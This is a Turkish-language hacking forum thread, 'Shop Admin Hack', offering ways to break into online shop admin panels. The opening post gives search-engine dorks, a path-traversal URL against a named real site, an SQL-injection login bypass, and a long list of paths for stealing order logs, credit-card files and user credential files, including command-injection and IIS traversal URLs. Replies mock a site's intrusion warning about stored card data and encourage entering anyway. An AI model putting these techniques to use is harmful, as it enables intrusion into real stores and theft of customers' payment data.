Shop Admin Hack
-
Bu numara ile shop sitelerinin admin panellerini hackleyebilirsiniz.
Gir : www.google.com
Bunu ara : inurl:cgi-bin/commercesql
Örnek : http://www.odysseylearningservices.com/cgi-bin/commercesql/
Aşağıdaki zımbırtıyı linkin sonuna ekle
/index.cgi?page=../admin/files/order.log
Aşağıdaki link üstteki zımbırtıya örnektir.
http://www.odysseylearningservices.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
Sonrası Allah Kerim
------------------------
Bir diğeri :
arama kodumuz:: allinurl:/shopadmin.asp
önümüze baya bir site gelecek
admin girişine giriyoruz
user : 'or'1 pass : 'or'1
yazıyoruz ve paneldeyiz
--------------------------
Shop admin hacklemek için scannerlar için taratabileceğiniz database uzantılarıda şunlar :
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=otherrisinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/errorHadi bakim kolay gelsin
-
Hack attempt logged and will be reported to your ISP!
IP: 88.239.83.169
Remote port: 3419
Host::S bune la :|
edüt büdüt: bişe olursa yaktım sni holy :P
-
O shop menünün koruması war oraya giremessin yalnış denediğin için çıktı o kırmızı bi ekran ve itfaiye sireni ötüyo :) Ondan bi halt olmaz boşver başka site dene :)
-
www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-
seadog bunu yazdı:
-----------------------------www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-----------------------------tamama bas ve gir :D
adam 50 defa üzerinden geçmiş sitenin :D
sen FBI dan bahsediosn :D
-
hacı korkutmadır falan diye düşündüm ama yinede bi söliyim dedim :S:D
-
seadog bunu yazdı:
-----------------------------www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-----------------------------ne sakatı hocam gir ne yapacaksan yap :).... kredi kartı bilgilerinin oldugu bi sitede böyle açık mı olur ... user ve password'u girince başka birinin orayı hacklemiş olduğunu göreceksindir.
-
fbi işi gücü yok bi admin paneline girdin die kapına gelcek:D
-
seadog bunu yazdı:
-----------------------------www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-----------------------------yok anasının .mı :D ahauhauah FBI nedir ya :d
-
pessimist bunu yazdı:
-----------------------------
seadog bunu yazdı:
-----------------------------www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-----------------------------yok anasının .mı :D ahauhauah FBI nedir ya :d
-----------------------------tamam yüklenmeyin daha çocuğa :) emin olmak istemiş sadece :)
-
Never-More bunu yazdı:
-----------------------------
pessimist bunu yazdı:
-----------------------------
seadog bunu yazdı:
-----------------------------www.vvoamc.com/shop/shopadmin.asp
ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S
-----------------------------yok anasının .mı :D ahauhauah FBI nedir ya :d
-----------------------------tamam yüklenmeyin daha çocuğa :) emin olmak istemiş sadece :)
-----------------------------evet ya yüklenmeyin bana yaa yazık deil mi bana :S:S